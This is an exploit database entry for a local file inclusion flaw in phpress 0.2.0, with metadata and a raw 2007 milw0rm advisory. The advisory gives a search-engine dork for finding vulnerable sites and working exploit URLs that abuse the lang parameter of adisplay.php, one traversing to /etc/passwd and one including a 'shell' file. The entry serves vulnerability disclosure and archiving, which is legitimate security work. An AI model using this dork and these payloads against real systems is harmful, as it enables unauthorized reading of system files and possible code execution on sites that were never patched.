header-logo
Suggest Exploit
vendor:
phpress
by:
naxx
5.5
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name: phpress
Affected Version From: 0.2.0
Affected Version To: 0.2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpress Local File Inclusion Vulnerability

The vulnerability allows an attacker to include files from the local file system.

Mitigation:

Ensure proper input validation and sanitization of user-supplied input.
Source

Exploit-DB raw data:

:::::::::::::::::::::::::::::::::::::::::::::::::::.......................
::| \ | (_)          | \ | |                       / ____|                  
::|  \| |_  ___ ___  |  \| | __ _ _ __ ___   ___  | |     _ __ _____      __
::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | |    | '__/ _ \ \ /\ / /
::| |\  | | (_|  __/ | |\  | (_| | | | | | |  __/ | |____| | |  __/\ V  V / 
::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___|  \_____|_|  \___| \_/\_/
:::::::::::::::::::::::::::::We got the nicest name in the security scene!
::::::::Info::.
::Script: phpress 
::Version: 0.2.0 
::Homepage:http://sourceforge.net/projects/phpress/
::
:::::::::Details::.
::Type: Local_File_Inclusion
::Dork: allinurl:/phpress/
::Exploit: http://host/phpress/adisplay.php?lang=shell
::Exploit: http://host/phpress/adisplay.php?lang=../../etc/passwd
::
::Variable lang is not defined
::
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: naxx@chilloutzone.eu
::Website: none yet
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.

# milw0rm.com [2007-09-08]